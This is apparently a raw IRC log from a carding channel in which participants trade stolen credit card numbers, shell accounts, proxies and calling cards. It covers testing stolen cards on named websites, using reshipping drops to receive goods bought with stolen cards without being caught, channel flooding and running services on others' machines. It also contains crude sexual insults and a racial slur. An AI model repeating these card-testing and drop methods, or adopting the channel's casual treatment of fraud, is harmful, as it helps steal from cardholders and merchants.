:DuXO! :hi to all :Razzorz! :anyone have bnc :Razzorz! :anyone have bnc? :Razzorz! :please tell me about bnc :DuKso! :hi anyone alive? :2red! :nope :DuKso! :how are u 2red :) :DuKso! :where are u from? :2red! :<- mortie/lita :DuKso! :hi man :DuKso! ::) :DuKso! :what are u doing:) :2red! :nothing :2red! :just listening to music :Nic[EQ]! :ACTION is trading Visas and MCs, looking for more or for shells :Emy__! :I need some cc `s (I do not have any ) :FooDSt4mP! :anybody have any visa's? i need to get a plane tick for a chick who's being abused by her husband :FooDSt4mP! :ill trade shells and dialup accounts for a visa/cc :[St0rM]! :hahahah :FooDSt4mP! :dude its not funny :FooDSt4mP! :its sad :FooDSt4mP! :i know it sounds like good bs for a card but its not.. :MonTs! :what sort of shells? :FooDSt4mP! :aragorn.example.net :FooDSt4mP! :its a linux box.. rh 6.1... 6 bg's... 250 meg quota... :MonTs! :how many BG process? :FooDSt4mP! :redundant t3 conn :FooDSt4mP! :6 bg's :MonTs! :what's the http address? :FooDSt4mP! :no http.. its a private shell off a friends companies box :FooDSt4mP! :example.net is the isp :FooDSt4mP! :aragorn.example.net is the telnet addy :FooDSt4mP! :i just need some cc to get a damn ticket for this girl man :FooDSt4mP! :msg me if you wanna trade :pFFt--! :ACTION any1 wanna trade virgin cc's? msg me for fair trade (rippers go away) :pFFt--! :ACTION any1 wanna trade virgin cc's? msg me for fair trade (rippers go away) :2red! :pFFt-- :Neon! :Have some cc... :pFFt--! :ACTION any1 wanna trade cc's? msg me for fair trade (rippers go away) :pFFt--! :ACTION any1 wanna trade cc's? msg me for fair trade (rippers go away) :2red! :we hear you :2red! :stop it :pFFt--! :ACTION any1 wanna trade cc's? msg me for fair trade (rippers go away) :pFFt--! :ACTION any1 wanna trade cc's? msg me for fair trade (rippers go away) :pFFt--! :ACTION any1 wanna trade cc's? msg me for fair trade (rippers go away) :pFFt--! :ACTION any1 wanna trade cc's? msg me for fair trade (rippers go away) :kurky! :I need someone to do me a favour.... :kurky! :ull get a few virgin visa's :m4r1n4ru! :-join #rocarding :m4r1n4ru! :-save :glipy! :bah :glipy! :care-mi zice shi mie un site de un sa cumpar tembelfoane :glipy! :hap :glipy! :? :^W! :ACTION is trading ccz msg me for trade :wizz! :hey tabacu :TanTouze! :ok I'm here, now what were you saying? :NiCeBoY! :ello :NiCeBoY! :wers coolworx? :Mendoza! :hey . Ibill is cardable? :DuXo! :hi to all :DuXo! :how are we today :NiCeBoY! :ello duxo :ABA! :Anyone want to trade cards? MSG me :DuXo! :npn msg me :ABA! :Anyone want to trade cards? MSG me :NiCeBoY! : :DuXo! :any trade cc :ABA! :Anyone want to trade? :DuXo! :me :) :ABA! :heh :ABA! :again? :DuXo! ::)) :DuXo! :yes but do u have with the phone number too? :lkd1! :i have :ABA! :no, just make one up innit :P :DuXo! :lkd1 :) :DuXo! :ripper:) :DuXo! :he just leave the channel :)) :ABA! :ripper? :DuXo! ::) :ABA! :I just traded wif him :P :DuXo! :aND? :DuXo! ::) :DuXo! :he gaved u valid? :DuXo! :i haven`t trade.. :ABA! :I verified :DuXo! :but he don`t wanted to trade with me ..... :ABA! :before I gave him # :DuXo! :becasue he thinked... :DuXo! :im ripper :2red! :duxo :P :DuXo! :with +v :ABA! :heh :ABA! :ive been ripped so many bloody times :ABA! :if they dont give me first :ABA! :I dont trade ever :DuXo! :ok.... :ABA! :cos ive been ripped so many times :ABA! :about 10 times wif cards :ABA! :3 shells :ABA! :etc :2red! :tss :2red! :is that supposed to be something? :2red! :i got ripped off 40 virgins in one deal once :ABA! :40 virgins what? :2red! :40 virgin cards :ABA! :Drake``: Trade? :ABA! :ic :ABA! :and when some little foreign pissant lamer :ABA! :steals from you :Drake``! :trade what? :ABA! :then runs off :ABA! :Drake``: Cards :ABA! :it makes you wanna bloody cry :ABA! :and beat your comp :ABA! :innit :2red! :where are you from npn, romania? :ABA! :no uk :2red! :ok :2red! :sweden here :ABA! :england :2red! :interested in UK virgins? :ABA! :leet :ABA! :hmmm :ABA! :yup :2red! :i got plenty of international virgins :2red! :and US ofcourse :ABA! :quick tho :ABA! :cos i gtg real soon :2red! :err? :2red! :quick though what :ABA! :trade quick :ABA! :get on wif it :ABA! :cos i gtg :2red! :why would i trade virgins? :ABA! :no :ABA! :like i gib you summat else :2red! :hehe :2red! :i sell cards dear. :ABA! :oh dear :ABA! :so :ABA! :what do you want for it :2red! :money :ABA! :how much? :2red! :depends on how many you want :ABA! :10 :2red! :100 dollars :ABA! :fuck me :2red! :? :ABA! :(please) :ABA! :i aint got 100$s :2red! :thats what it costs :2red! :thats how it is :) :hhkrgb! :romania anyone? :Bl4ck_! :yes :ABA! :0mg :ABA! :I dont fucking believe this :ABA! :that fool :ABA! :DuXo just ripped my card :ABA! :and ran :2red! :you surprised or something? :ABA! :erm :ABA! :yes :ABA! :hes an op :2red! :so? :ABA! :and ops dont do that kind of shit :ABA! :ive been trading here :ABA! :for about :ABA! :6 months :ABA! :and no ops ever done that shit :2red! :thats interesting :2red! :cause i havent seen you areound much before :ABA! :Ive never seen you either :m4r1n4ru! :ABA can you send me a log man ? :2red! :my usual nick is mortie or lita :ABA! :m4r1n4ru yea, when I get back :ABA! :2red: ive seen the nick lita :ABA! :ages ago :m4r1n4ru! :ok send me log please :ABA! :I need dinner :t4b4cu! :huh :2red! :duxo :Piano2! :what? :t4b4cu! :so taht's lita :DuXo! :it`s me.. :Bl4ck_! :t4b4cu? :2red! :im lita yeah :t4b4cu! :always changing nicks :t4b4cu! :hhe :DuXo! :i know.. :Bl4ck_! ::>> :2red! :doesnt matter since i dont trade :2red! :i just watch you ppl :DuXo! :hm :2red! :and obviously an op just ripped? :DuXo! :npn :DuXo! :man :DuXo! :m4r1n4ru :DuXo! :i haven`t rip him up :2red! :what happened then? :DuXo! :man :DuXo! :he gaved me CCs :m4r1n4ru! :ya :m4r1n4ru! :what ? :DuXo! :2 :DuXo! :and the both where invalid :DuXo! :we tradeed 340 minutes before :t4b4cu! :? :DuXo! :we tradeed 30 minutes before :DuXo! :he gaved me valid :t4b4cu! :who ripped? :DuXo! :and i gaved him valid CC :DuXo! :man :DuXo! :becuase i haved +v :t4b4cu! :who ripped? :t4b4cu! :i ban anyone who ripps :t4b4cu! :so ....i'd like to know :DuXo! :i checked the 2 ccs on www.come.to/tdnga :DuXo! :the first 2 sex banners.. :DuXo! :i used the first one :DuXo! :and the CC comed out decliened :DuXo! :after that :DuXo! :i checked the CC on www.bonzi.com :DuXo! :on Internet Boost :DuXo! :the first one come out and send me Invalid Card... :DuXo! :and another that the card is not valid anymore... :DuXo! :tabacu are u here?? :2red! :oh well :2red! :you kids :2red! :i never understood the point of trading cards anyway :t4b4cu! :ahhahaah :t4b4cu! :looolz :t4b4cu! :us kids? :DuXo! :LoL :t4b4cu! :how old are u my dear? :2red! :im 20 :2red! :why :DuXo! :so :t4b4cu! :lolz :DuXo! :what will happen? :t4b4cu! :i'm 20 too :DuXo! :u know that im a Legit one :DuXo! :i can prove that man.. :DuXo! :i have never ripped a man :t4b4cu! :most ppl areound here are about that age :2red! :i dont see anyone in here as legit :t4b4cu! :ahhah :t4b4cu! :what about me? :2red! :why would i see you as legit? :t4b4cu! :i have more ccs than anyone here :t4b4cu! :heh :2red! :and how many is that? :t4b4cu! :and i never ripped in my life :t4b4cu! :about 40.000 :2red! :is it just me or could anyone say that? :t4b4cu! :anyway....i more hacker than carder :2red! :same here :t4b4cu! :that's why i could take this chan over :t4b4cu! :eheh :t4b4cu! :with my friends :hhkrgb! :join/romania :2red! :taking over a channel doesnt really require any skills. :hhkrgb! :wops :t4b4cu! :we flooded from oc48 :t4b4cu! :heh :t4b4cu! :lolz :t4b4cu! :it does :2red! :packeting is for kids :t4b4cu! ::) :DuXo! :tabacu :DuXo! :is everthing ok now? :t4b4cu! :yeh it is :DuXo! :ok.. :m4r1n4ru! :hhm :DuXo! :what? :m4r1n4ru! :so he ripped or not ? :DuXo! :no man.. :DuXo! :i telled u i checked the cc :DuXo! :where is he :DuXo! :i will talk with him :DuXo! :and check the CCs again :DuXo! :and give to the channel :m4r1n4ru! :ok :DuXo! :i don`t have the logs.... :DuXo! :to prove right now.. :hhkrgb :co^digigi! :hekss :co^digigi! :heks... :co^digigi! :i have a shell...and wanna trade with calling card :co^digigi! :serious person msg me :DuXo! :cool :Co0lWoRx! :yo :DuXo! :let`s got to work :DuXo! :gety :DuXo! :get :DuXo! :and try that . :Co0lWoRx! :damn it :DuXo! :what the fuck is this :) :seriuscar! :what did you have in mind about tradi :seriuscar! :have bnc, proxies and shell....msg me if want to trade :seriuscar! :have bnc, proxies and shell....msg me if want to trade :Drake``! :co^digigi left after ripping me :Drake``! :hehehe :Co0lWoRx! :yo drake :seriuscar! :have bnc, proxies and shell....msg me if want to trade :seriuscar! :have bnc, proxies and shell....msg me if want to trade :seriuscar! :have bnc, proxies and shell....msg me if want to trade :MRuiCosta! :ACTION will trade virgin mc and visa for a shell acct that lets me dns host a .net site :taur! :salut :taur! :astia tac si fac :ows :ows :ows :MonTs! :howdy folks? :xKurko! :Can anyone do me a favour... Msg me.... Virgin CC in it for ya :xKurko! :Can anyone do me a favour... Msg me.... Virgin CC in it for ya :iDoetS! :gollllllllllllll :iDoetS! :1 more :MonTs! :1 more for whom? :iDoetS! :ceko :m4r1n4ru! :-join #rocarding :m4r1n4ru! :-save :xKurko! :can anyone gimme one fast proxy??? :m4r1n4ru! :-op :|AmDeAtH! :-op :|AmDeAtH! :lol hehe :Reaggyman! :Do sombody now what the program ares do? :Reaggyman! :whats ares? :trinix! :sup all? :Reaggyman! :trinix: do you now what ares is :trinix! :any one got any tips for ordering stuff to yer own house with out getting caugfht? :trinix! :caught? :trinix! :no :trinix! :sultrix says u guys are the ones to ask :Reaggyman! :Do you now a program that cracks sex(enter)password? :trinix! :nope :Reaggyman! :are you new here? :trinix! :yeah :Reaggyman! :me to :Reaggyman! :nowbody answers :trinix! :I am from uk :Reaggyman! :Norway :trinix! :I need help on how to order to my house with out getting caught :trinix! :using cc :Reaggyman! :What? :Reaggyman! :Order What? :trinix! :I wanna order stuff yeah but want to order straight to my house in the uk :Reaggyman! :isent that easy? :trinix! :hmm not sure :trinix! :I wanna an abandoned house but can't find any :Reaggyman! :I dont now :Reaggyman! :i came here to :Reaggyman! :i need a cracking program :trinix! :why dun you just go to www.xxxpassowrds.com :glipy! :what cracking program :Reaggyman! :i dont think they got THAT kind of passwords :Reaggyman! :The name is Ares :Reaggyman! :Hi sultrix :trinix! :heya man :Reaggyman! :i was band for xxxpasswords :Sultrix! :Hello :Sultrix! ::-( :Reaggyman! :Can you help me sultriz :Reaggyman! :x :Sultrix! :Can you guys help me i had a few working CC's but the dun work no more cxan anyone throw me few WORKING cc's my way please ? :Sultrix! :Reaggyman: Sure whatsup ? :Reaggyman! :Do you now a program that cracks sex(enter)password? :MonTs! :Reaggyman ....try going to http://www.catfiles.net/adult.htm :Sultrix! :hmm :Sultrix! :no idea :Reaggyman! :Monts: whats that? :MonTs! :go there and have a look :Reaggyman! :and this is :Reaggyman! :password? :Reaggyman! :Hi tauer :Tauer! :hi :Reaggyman! :can you help me? :Reaggyman! :Do you now a program that cracks sex(enter)password? :astavista! :lol :trinix! :shit can anyone slide me some tips? :tauer! :mai :tauer! :asa ceva mai greu :trinix! :shit can anyone slide me some tips? :Reaggyman! :tauer what+ :tauer! :dar poti s-a te duci la un site care da passworduri pt siteuri de genu asta :trinix! :wtf :tauer! :sau potzi s-a te inregistrezi cu un card :Reaggyman! :English plis :tauer! :lol :tauer! :u can go to a site thwt give u password :tauer! :sheet :tauer! :sorry :trinix! :wtf :tauer! :anibody spek romanian? :trinix! :shit can anyone give me some tips? :tauer! :what kind of tips? :tauer! :trinix? :Sultrix! :in credit card fraud he means :tauer! :lol :tauer! :what i am thinking....:) :Sultrix! :heh :tauer! :the chanel carding :trinix! :I wanna send some stuff to my house in the uk, any tips on how to not get caught? :tauer! :is hard to someone to teel u about theat :tauer! :in uk? :tauer! :is verry hard :trinix! :what? :tauer! :but u can sendit to me in other country :trinix! :is hard to someone to teel u about theat <------------ what? :tauer! :and i can sendit to u :trinix! :nah :tauer! :about:I wanna send some stuff to my house in the uk, any tips on how to not get caught? :xKurko! :I offered that and Im in the UK with a different drop than my house :trinix! :I have cc of people in USA and wanna buy stuff in the UK and send it to me in my house :tauer! :i dont write to well in enghlish :trinix! :any tips? :tauer! :u can sendit to me in romania and i sendit to u after the pocket arieve to me :tauer! ::) :trinix! :nah take to long :tauer! :lol :tauer! :is my turn? :trinix! :besides you might keep it :tauer! :to ping time out? :tauer! :food weaponds? :tauer! :flood :trinix! :wb bro :Sultrix! :ta :Sultrix! :wassup bra :trinix! :nadda :trinix! :reading up on some shit :Sultrix! :cool :Sultrix! :Has anyone here got any WORKING CC numbers ? :tauer! :i sell vodoo 3 3000 100$ :tauer! :whith id :tauer! ::) :damang! :need some fresh cc :Sultrix! :me too :YesIAm! :haha :trinix! :me too :Sultrix! :Anyone got any cc numbers that work :trinix! :answer him god damn it :YesIAm! :my cc number works :fus10nx! :nope... :YesIAm! ::) :CC-Master! :who trade here? :fus10nx! :not U :fus10nx! :Not I :trinix! :fus10nx yeah.... :CC-Master! :? :CC-Master! :so :CC-Master! :anyone for trade round here? :damang! :shells for fresh cc :CC-Master! :what shels or ccz? :damang! :i have shelz :Sultrix! :Does anyone have any CC's ?? :CC-Master! :ye :CC-Master! :i have :CC-Master! :so? :Sultrix! :that i can have :YesIAm! :hahaahaha :Sultrix! :ffs :damang! :need some fresh cc :Sultrix! :Can nayone dish some ccs my wya pease :YesIAm! :If somebody wanted to donate a # he would paste it into the chan :damang! :i have shelz wana trade w/ cc :BONI! :hi anyone for trade? :YesIAm! : anyone for trade round here? :BONI! :? :BONI! :so>? :rgers! :hi boni :rgers! :how are u? :rgers! ::)) :Nic[AwaY]! :ACTION have a lot of ccs ( Mastercards and Visas ) trading for more or eggdroppable shells :Papa-tudo! :anyone trade bncs with vhosts? :Papa-tudo! :ACTION trading bncs with vhosts :Papa-tudo! :ACTION trading bncs with vhosts :Papa-tudo! :ACTION trading bncs with vhosts :ureche! :re :_Mephisto! :re :_Mephisto! :cine pizda masii a pus topicul ala idiot? :SIZIF! :enybody have cc? :Bl4ck_! :t4b4cu :ucok! :hai :Bl4ck_! :salut :ucok! : :ucok! :xeexxexeexxeeeexe :t4b4cu! :salut :dlotos33! :is there anyone from MACEDONIA? :SIZIF! :yep :blazo99! :what's the problem duds :FanTom! :some one wots to trade :GoDsHaNd! :can someone help me? :blazo99! :what's the problem :GoDsHaNd! :blazo99 :GoDsHaNd! :ej :GoDsHaNd :Pinu\away! :hi :t4b4cu! :c :Clasher! :Sorry to bother, but, does anyone have a spare card? :Co0lWoRx! : :Bl4ck_! :m4r1n4ru :Bl4ck_! :m4r1n4ru :Bl4ck_! :m4r1n4ru :m4r1n4ru! :marca ma :Co0lWoRx! :7me any1 here wanna earn +v, msg me now :Co0lWoRx! :ACTION any1 here wanna earn +v, msg me now :Co0lWoRx! :ACTION any1 here wanna earn +v, msg me now :Bl4ck_! :de ce am ban pe #rocarding? :Bl4ck_! :Co0lWoRx :PP :m4r1n4ru! :? :Co0lWoRx! :? :Co0lWoRx! :? :Co0lWoRx! :??? :Bl4ck_! :Co0lWoRx I used to have +v in here :Bl4ck_! ::>> :Co0lWoRx! :well, y u loose it? :Bl4ck_! :dunno :Bl4ck_! :never minds :Bl4ck_! ::>> :SIZIF! :enybody have cc? :Co0lWoRx! :look at this shit ppl :Co0lWoRx! : do u have cc's? :Co0lWoRx! : hmmm, yes, a lot :Co0lWoRx! : would u like to send me just one? :Co0lWoRx! : hahahaha, go away pls lamer :SIZIF! :enybody have cc? :Co0lWoRx! :ure banned man, bye :SIZIF! :IZIF> succker > :DuXo! :come on :DuXo! :go shake ur dicks:))))) :Co0lWoRx! :lol :_Mephisto! ::P :DuXo! :put ur dick in the Cd-rom :)) because u can`t put it in pussy :)))))) :yourlife! :? :DuXo! :what ??? :yourlife! ::) :m4r1n4ru! :-join #rocarding :m4r1n4ru! :-save :TanTouze! :I was sexually assaulted by Bill Clinton :DuXo! :anyone here wants to be my drop? :Sp07! :sup :Sp07! :im done with high school :Sp07! :ahahhhhhhhhhhhhhhhhhhhhhhhhhahahaa :Sp07! : :Sp07! :@#$ :Sp07! : :Sp07! : :DuXo! :bye to all :_Mephisto! :bya :_Mephisto! :bye :Tzaranul! :aaa :Tzaranul! :re :Tzaranul! ::) :SPANkY_! :anyone here trade msg me :SPANkY_! :anyone here trade msg me :Nightw|sH! :re Bl4ck :SPANkY_! :anyone here trade msg me :trinix! :sup all? :trinix! :any one want to send some ccs over my way? :trinix! :any one want to send some ccs over my way? :SPANkY_! :anyone here trade msg me :D1ck! :ins :D1ck! :J4n3 :SPANkY_! :anyone here trade msg me :SPANkY_! :anyone here trade msg me :SPANkY_! :anyone here trade msg me :dmonchild! :ACTION i am selling hardware if your intrested please /msg me for prices :Cyb3rL0rd! :re ppl :Sultrix! :Does anyone have any WORKING credit cards the will let me have one to use ? :hackmon! :bye :Sultrix! :Does anyone have any WORKING credit cards the will let me have one to use ? :Fr0d! :any1 op/voice wanna trade :m4r1n4ru! :-op :Co0lWoRx! :hello :Fr0d`! :hey :Fr0d`! :sup manm :Bl4ck_! :Chel00 heya :m4r1n4ru! :ajajajajaj :Co0lWoRx! :lol :Co0lWoRx! :hey negro, do u ever wonder why Chel00 never talks? :Bl4ck_! :coz is an emech :Bl4ck_! :Chel00 say hi Co0lWoRx :Bl4ck_! ::> :Chel00! :hi Co0lWoRx :Bl4ck_! ::PP :Co0lWoRx! :lol :Co0lWoRx! :ok :_KAoS_! :anyone in that wants to trade? :Fr0d! :msg me :Co0lWoRx! :bbl :TanTouze! :sell me something.... anything. QUICK :Bl4ck_! :ACTION is away -[ bbl ]- at 04:48a -[ P:On / L:On ]- :Bl4ck_! :ACTION is back -[ bbl ]- gone 1 min 49 s :m4r1n4ru! :-op :m4r1n4ru! :-op :connex! :i need a cc to buy a shell...anybody can help me? :[Mighty]! :trade CC ? :Fr0d! :msg me :connex! :yes or visa(master) :Tzaranul! :re :Tzaranul! ::) :connex! :i need a cc to buy a shell...anybody can help me? :connex! :i need a cc to buy a shell...anybody can help me? :_Mephisto! :where do you buy the shell??? :Bl4ck_! :www.turbulent.net :Bl4ck_! :www.turboshell.com :Bl4ck_! :www.shellyeah.org :Bl4ck_! :www.bestshell.com :_Mephisto! :thx :Bl4ck_! ::> :[sm0ke]! :is turbulent.net cardable? :m4r1n4ru! :nope :m4r1n4ru! :ajajajaaja :[sm0ke]! :hehe. i knew it. . :[sm0ke]! :u have to mail da freakin receipt. .. to have it activated. . :connex! :i need a cc to buy a shell...anybody can help me? :connex! :pls help me :_Mephisto! :bye :connex! :i need a cc to buy a shell...anybody can help me? :connex! :pls help me :[sm0ke]! :buy a shell? where? :connex! :[sm0ke] help me :connex! :[sm0ke] help me i want to buy a shell :TheRason! :hello anybody :TheRason! :i need a cc to buy a web domain :[sm0ke]! : :card-it! :trading lists, /msg me.... :card-it! :trading lists and merchants, /msg me.... :card-it! :no traders in here? :Bl4ck_! :ACTION is away -[ Starcraft si astea si alea ]- at 06:26a -[ P:On / L:On ]- :card-it! :trading lists and merchants, /msg me.... :card-it! :trading lists and merchants, /msg me.... :card-it! :trading lists and merchants, /msg me.... :card-it! :trading lists and merchants, /msg me.... :card-it! :trading lists and merchants, /msg me.... :|Makaveli! :how can we get the +v??? :|Makaveli! :or an op :gatorade^! :ACTION is trading ccz msg me :J4n3! :D1ck ? :D1ck! :yep :D1ck! :y0 :D1ck! :i am from my dad's laptiop :D1ck! :sun :D1ck! :i need a webpage :D1ck! :for the box :J4n3! :webpage ? :D1ck! :deal finialised :D1ck! :and u know how can i accept credit card online? :J4n3! :yeah u can but fruad bauth hoga, but :D1ck! :? :J4n3! :if u set the rule that fax or email the scanned copy of credit card phir sahi hai :D1ck! :we have to pay for fraud or its their responsibility/ :D1ck! :oh :D1ck! :kool :J4n3! :yeah :) :D1ck! ::) :D1ck! :can u start the page :D1ck! :? :J4n3! :server ka kyia huwa ? :J4n3! :webpage ban jayega forun, j0e kay site ka matter hai meray pass, just need the prices :J4n3! :what's the compnay name ? i mean site name ? :J4n3! :? :D1ck! :got d/c :J4n3! :wb :J4n3! :webpage ban jayega forun, j0e kay site ka matter hai meray pass, just need the prices :D1ck! :thx :J4n3! :what's the compnay name ? i mean site name ? :D1ck! :company's name is 'Big Stuff' :D1ck! :or u have any beter name? :D1ck! :i want a site some thing like www.unixrules.net :D1ck! :i`ll tell u the prices :J4n3! :hmm :J4n3! :unixrules is booked i think :D1ck! :no no :D1ck! :i am ssaying :D1ck! :look at their page :D1ck! :it rox :J4n3! :oh u mean designing ? :D1ck! :yeps :D1ck! :hehe :D1ck! :'Big Stuff' :D1ck! :The Ultimate Web Solution. :J4n3! :hmm :D1ck! :till when will be the website complete? :J4n3! :wait lemme take a look :D1ck! :oki :J4n3! :hmm yeah saw it :D1ck! :kewl :D1ck! :what prices should we do? :J4n3! :no idea i think it should start from 9 to 10 $ for shell :J4n3! :3 to 4 for bnc :D1ck! :oki :J4n3! :webhosting i'll ask j0e :D1ck! :okies :J4n3! :oye what bout server ?? :D1ck! : 4 background processes (eggdrop, screen, irc) :J4n3! :got this box its fast 24.66.83.137.mb.wave.home.com :D1ck! : 2 login names :D1ck! : 20 MB total disk space :D1ck! : FTP, and SSH access :D1ck! : 2 POP3 Email addresses (username@celebreum.net) :D1ck! : Access to hundreds of VHOSTS :D1ck! : 3 months [$30] - 6 months [$60] - 12 months [$120] :D1ck! : Credit Card Customers, Sign up here :D1ck! : Sign up Now :J4n3! :but no linux root kit :( :D1ck! :server? :D1ck! :heheh :J4n3! :i mean have u finalized? :D1ck! :my computer is not working :D1ck! :thats why i am in this :D1ck! :yep :J4n3! :oh :D1ck! :finisalised :J4n3! :going to pay for it ? :D1ck! :yep :J4n3! :anuallay ?? how much ? :D1ck! :welp :D1ck! :200/month :D1ck! :and rent is 25 :D1ck! :225 :J4n3! :oh kewl :J4n3! :ip's ? :J4n3! :how much ip's ? :D1ck! :256 :D1ck! ::") :J4n3! :great :) :D1ck! :hehe :D1ck! :wait i`ll send u .txt for shells :D1ck! :one sec :J4n3! :k :J4n3! ::) :D1ck! ::) :J4n3! :Caldera OpenLinux(TM) :J4n3! :Version 2.2 :J4n3! :Copyright 1996-1999 Caldera Systems, Inc. :D1ck! :oye accept this :J4n3! :send send :J4n3! :bin/login: error in loading shared libraries: libcrypt.so.1: cannot open shared object file: No such file or directory :D1ck! :make it attractive and stuff :J4n3! : DCC Unable to create connection: Connection refused :D1ck! :err :D1ck! :copy paste this :D1ck! :SPECIAL PACKAGE :D1ck! : :D1ck! : 4 background processes (eggdrop, screen, irc, energymechs) :D1ck! : 25 MB total disk space :D1ck! : FTP, and SSH access :D1ck! : 2 POP3 Email addresses (username@celebreum.net) :D1ck! : Access to hundreds of VHOSTS :D1ck! : :D1ck! : 1 month [$20] 3 months [$40] - 6 months [$60] - 12 months [$120] :D1ck! :SILVER SHELL ACCOUNT :D1ck! : 2 background processes (eggdrop, screen, irc, energymechs) :D1ck! : 10MB total disk space :D1ck! : FTP, and SSH access :D1ck! : POP3 Email addresses (username@celebreum.net) :D1ck! : Access to hundreds of VHOSTS :D1ck! : 1 month [$10] 3 months [$30] - 6 months [$55] - 12 months [$100] :D1ck! : :D1ck! :GOLD SHELL :D1ck! : 4 background processes (eggdrop, screen, irc, energymechs) :D1ck! : 2 login names :D1ck! : FREE Personal vhost (username@can.choose.from.many.domains) :D1ck! : 100 MB total disk space :D1ck! : FTP and SSH access :D1ck! : 2 POP3 Email addresses (username@celebreum.net) :D1ck! : Access to hundreds of VHOSTS :D1ck! : 3 months [$60] - 6 months [$110] - 12 months [$200] :D1ck! :make the rupeese too pls :D1ck! ::P :J4n3! :hah u forgot to write the BitchX ? :D1ck! :oh yes :D1ck! :irc==BitchX :J4n3! :eggdrop, screen, irc, energymechs, BitchX :D1ck! :yep yep :D1ck! :add it :D1ck! ::P :J4n3! :ok :J4n3! :kkz wait lemme copy it :D1ck! :oye thats stolen from unixrules :D1ck! :so change it a bit :D1ck! :jhehe :D1ck! :hehe :J4n3! :ok done :) :J4n3! :yeah don worry prices r same ? :J4n3! :or u modified it ? :D1ck! :modified :D1ck! :and mb space too :J4n3! :kkz :J4n3! :Celebrium ? :D1ck! :yep :D1ck! :ok now webpage :D1ck! :BASIC WEBHOSTING :D1ck! : 100MB disk space :D1ck! : 1 Mailbox (POP3/SMTP) :D1ck! : $0.50 per MB on any average storage beyond the standard allowed disk space :D1ck! : 500 MB of data transfer per month :D1ck! : 3 months [$30] - 6 months [$55] - 12 months [$100] :D1ck! :PRIME WEBHOSTING :D1ck! : 200 MB disk space :D1ck! : 5 Mailboxes (POP3/SMTP) :D1ck! : FREE Domain Name Registration (internic fee applies) :D1ck! : Unlimited email address forwarding :D1ck! : Custom CGI script directory :D1ck! : $0.50 per MB on any average storage beyond the standard allowed disk space :D1ck! : 1500 MB of data transfer per month :D1ck! : 3 months [$60] - 6 months [$110] - 12 months [$200] :D1ck! :PRO WEBHOSTING :D1ck! : 350 MB disk space :D1ck! : 25 Mailboxes (POP3/SMTP) :D1ck! : Unlimited email address forwarding :D1ck! : Custom CGI script directory :D1ck! : PHP3 access :D1ck! : Frontpage Extension access :D1ck! : $0.50 per MB on any average storage beyond the standard allowed disk space :D1ck! : 5000 MB of data transfer per month :D1ck! : 3 months [$150] - 6 months [$275] - 12 months [$500] :D1ck! :modify style and idhar udhar so it doesnt look as we stole it :D1ck! :hehe :J4n3! :hah is say kuch nahi hotha waisy bee almost sub shells kay milthay julthay hain :D1ck! :EMAIL HOSTING :D1ck! : FREE Domain Name Registration (Internic Fee applies) :D1ck! : username@your-company.com :D1ck! : 5 Mailboxes (POP3) :D1ck! : 25 Emails Forwarding :D1ck! : 3 months [$30] - 6 months [$50] - 12 months [$75] :D1ck! :lol :D1ck! :yup :D1ck! ::P :D1ck! :oye when will it be complete :D1ck! :asnd i am signing up legal domain :D1ck! :where should i? :D1ck! :cheapest :D1ck! :? :J4n3! :hmmm :D1ck! :mater may we are OC3 :P :J4n3! :dotster.com :D1ck! :OC3 lines :D1ck! :ok :J4n3! :yeah from where u getting this server ? and till when u get it ? :J4n3! :it should be on redhat ok ? :D1ck! :easilyhosted :D1ck! :yep :D1ck! :it is :D1ck! :i`ll make it ultra secure :D1ck! :redhat 6.2 :J4n3! :haha kewl :D1ck! :i`ll upgrade to new kernel :J4n3! :give me 2 days for web :D1ck! :2.2.16 :D1ck! :kewl :D1ck! :okies :J4n3! ::) :D1ck! :the day u do it :D1ck! :the next day ill get the seerver :D1ck! :online :J4n3! :hmmm :J4n3! :talked to ur dad bout it ? :D1ck! :ofcourse :D1ck! :he sed 'yes' :D1ck! :and i have his cc in my hand :D1ck! ::P :J4n3! :haha cool :J4n3! :woooo :J4n3! ::p :D1ck! ::/ :J4n3! :lekin signup kahan say kiya ?? konsee company say ? :J4n3! :t3 ? :J4n3! :or oc3 ? :D1ck! :well :D1ck! :more then Tota1KaaS1 :D1ck! :t1 :D1ck! :but :D1ck! :technically OC3 :D1ck! :ll providers who sya they are oc3 are lieing, yes technicqally they :D1ck! :are :J4n3! :ahaan :D1ck! :but its shared bandwith :D1ck! :mine will be 990k/sec :J4n3! :w00ps :D1ck! :to 2 mb :D1ck! :and 40 gigs of transfer :J4n3! :shells will rock on this server :D1ck! :yep :D1ck! ::) :D1ck! :and i`ve heard routers are firewalled :D1ck! :so thats a good enws :J4n3! :great already signed up , or going to ? :D1ck! :oye pls get started on the page if u are not too bz :D1ck! ::P :D1ck! :i will send the payment :J4n3! :yeah i will from today :D1ck! :no cc :D1ck! :and today i`ll buy a merchant account :J4n3! :oh ohkay :) :D1ck! ::) :J4n3! :u have too many ips :D1ck! :yep :J4n3! :we can buy more domains illlegaly to like j0e but :D1ck! :that rox :D1ck! :well :D1ck! :i can get caught :J4n3! :first we need the dns of ur server so we can give it when registering the domain :D1ck! ::p :J4n3! :like ns1 and ns2 :J4n3! :they need it for registeration :D1ck! :oh :D1ck! :i am half way through the registration :D1ck! :hehe :D1ck! :so i cant modify it later? :J4n3! :yeah :) :D1ck! :kewl :D1ck! :almost complete :J4n3! ::)))))) :D1ck! :hehe :D1ck! :a graphix of Big Tecnologies would rock :J4n3! :sure it would , just see :D1ck! ::/ :D1ck! :oki :J4n3! ::9:0:) :D1ck! ::) :J4n3! :how do i open a telnet on a box ?? from inetd.conf ? when it say connection refused on 23 , its not on hosts.allow :D1ck! :err they need name serfver :D1ck! :hehe :D1ck! :cat /etc/inetd.conf | grep telnet :D1ck! :and paste me here :J4n3! :yeah wait :J4n3! :hahah yeah :J4n3! :its close from there :J4n3! :the box is kewl i want to run psy from there :J4n3! :ip is admin.cgocable.net :J4n3! :wait lemme opne it :D1ck! :hehhe Romanian :m4r1n4ru! :Away :m4r1n4ru! :Away :m4r1n4ru! :Away :m4r1n4ru! :Away :D1ck! :Anyone have any "Gold-Line" Canadian Calling card #'s ?? :m4r1n4ru! :Away :[4g3nt]! :anyone can tell how to use a company credit card ???? :m4r1n4ru! :Away :TanTouze! :hi goober... oops wrong window :Ricky! :if someone would like to xchange cards contact me :m4r1n4ru! :Away :m4r1n4ru! :Away :m4r1n4ru! :Away :Co0lWoRx! :yo m4r1n4ru, stop it pls :Co0lWoRx! :yo m4r1n4ru, stop it pls :Co0lWoRx! :yo m4r1n4ru, stop it pls :Co0lWoRx! :yo m4r1n4ru, stop it pls :Co0lWoRx! :damn it, im tired of all this shit :Co0lWoRx! :ok? :Ricky! :ii have 2 cards i 